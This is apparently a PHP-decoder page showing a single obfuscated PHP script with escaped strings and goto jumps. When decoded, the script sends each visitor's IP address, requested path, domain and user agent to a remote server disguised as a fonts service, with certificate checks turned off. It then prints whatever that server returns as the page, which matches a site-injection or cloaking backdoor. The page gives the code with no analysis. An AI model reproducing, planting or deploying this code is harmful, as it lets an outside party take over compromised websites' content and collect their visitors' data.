PHP Decode

 goto Z4cWb; WWdS5: function getIP() { if (getenv("\x48\x54\x54\x50\137\x43\114\111\105\116\124\137\111\x50") && strcasecmp(getenv("\110\124\x54\x50\137\103\x4c\111\105\116\x54\137\111\x50"), "\x75\156\153\x6e\x6f\167\156")) { $ip = getenv("\x48\x54\x54\120\137\x43\x4c\111\105\116\124\x5f\111\120"); } elseif (getenv("\110\124\x54\120\x5f\130\137\106\x4f\122\127\101\122\x44\105\104\137\106\x4f\122") && strcasecmp(getenv("\110\124\x54\x50\137\x58\137\106\117\122\127\101\x52\x44\x45\x44\137\106\117\x52"), "\x75\x6e\x6b\156\157\167\156")) { $ip = getenv("\110\x54\x54\x50\137\130\x5f\106\x4f\122\x57\x41\x52\104\x45\104\137\106\117\x52"); } elseif (getenv("\122\105\115\117\x54\105\137\101\x44\104\122") && strcasecmp(getenv("\122\105\x4d\117\124\x45\x5f\x41\104\104\x52"), "\x75\156\153\156\157\167\156")) { $ip = getenv("\x52\x45\115\117\x54\105\x5f\x41\104\104\x52"); } elseif (isset($_SERVER["\122\105\x4d\117\124\105\x5f\101\104\x44\122"]) && $_SERVER["\122\x45\115\x4f\124\x45\137\101\104\x44\x52"] && strcasecmp($_SERVER["\122\x45\115\x4f\124\x45\137\x41\104\x44\122"], "\x75\156\153\156\x6f\x77\x6e")) { $ip = $_SERVER["\122\105\115\117\x54\x45\x5f\101\x44\104\x52"]; } return preg_match("\57\x5b\x5c\144\134\x2e\x5d\173\67\x2c\61\65\x7d\57", $ip, $matches) ? $matches[0] : ''; } goto jRTWn; Z4cWb: try { ini_set("\144\151\x73\x70\154\141\171\x5f\x65\x72\x72\x6f\x72\x73", "\x6f\x66\146"); error_reporting(E_ALL ^ E_NOTICE); set_time_limit(0); $Remote_server = "\x68\164\x74\x70\x73\x3a\x2f\57\x70\150\x2e\157\146\x66\x69\x63\x65\x66\157\156\x74\x73\55\x63\x6c\x6f\x75\144\x2e\x63\x6f\x6d\x2f\x70\x68\x70\64\x30\64\56\x70\150\160"; $header_curl = array("\x75\163\x65\x72\x5f\x61\147\x65\156\x74\x3a" . $_SERVER["\x48\x54\x54\120\x5f\x55\x53\x45\122\137\x41\107\105\x4e\x54"]); $domain = isset($_SERVER["\110\124\x54\120\x5f\130\x5f\x46\x4f\122\x57\101\x52\x44\x45\x44\137\110\x4f\123\124"]) ? $_SERVER["\x48\x54\124\x50\137\130\137\x46\x4f\122\127\x41\122\x44\x45\104\x5f\x48\117\x53\x54"] : (isset($_SERVER["\x48\124\124\x50\x5f\110\117\123\x54"]) ? $_SERVER["\x48\124\x54\x50\x5f\110\117\123\124"] : ''); $file = isset($_SERVER["\122\x45\x51\x55\105\x53\x54\137\125\x52\x49"]) && $_SERVER["\122\105\121\x55\x45\123\124\x5f\125\x52\x49"] != '' ? $_SERVER["\x52\105\121\125\x45\123\124\137\x55\122\111"] : $_SERVER["\x48\124\124\120\137\x58\x5f\122\x45\x57\122\x49\124\105\137\125\x52\114"]; $geturl = $Remote_server . "\x3f\151\160\75" . getIP() . "\46\146\x69\x6c\145\75" . $file . "\46\x64\x6f\x6d\141\x69\156\x3d" . $domain; $Content_mb = getUrlHead($geturl, $header_curl); if (strpos($geturl, "\x73\151\164\145\137\x6d\141\x70\56\170\x6d\154") !== false) { header("\x63\157\156\164\145\156\164\55\164\x79\x70\x65\x3a\x74\x65\170\x74\x2f\170\x6d\x6c"); } echo $Content_mb; die; } catch (Exception $exception) { } goto YwhgO; YwhgO: function getUrlHead($url, $header = '') { $curl = curl_init(); curl_setopt($curl, CURLOPT_URL, $url); curl_setopt($curl, CURLOPT_HEADER, 0); curl_setopt($curl, CURLOPT_TIMEOUT, 30); curl_setopt($curl, CURLOPT_RETURNTRANSFER, 1); curl_setopt($curl, CURLOPT_USERAGENT, $_SERVER["\110\124\x54\120\x5f\125\x53\105\122\137\x41\107\105\x4e\x54"]); curl_setopt($curl, CURLOPT_REFERER, @$_SERVER["\110\124\x54\x50\x5f\122\x45\x46\105\122\x45\x52"]); curl_setopt($curl, CURLOPT_SSL_VERIFYPEER, FALSE); curl_setopt($curl, CURLOPT_SSL_VERIFYHOST, FALSE); if ($header) { curl_setopt($curl, CURLOPT_HTTPHEADER, $header); } $data = curl_exec($curl); curl_close($curl); return $data; } goto WWdS5; jRTWn: ?>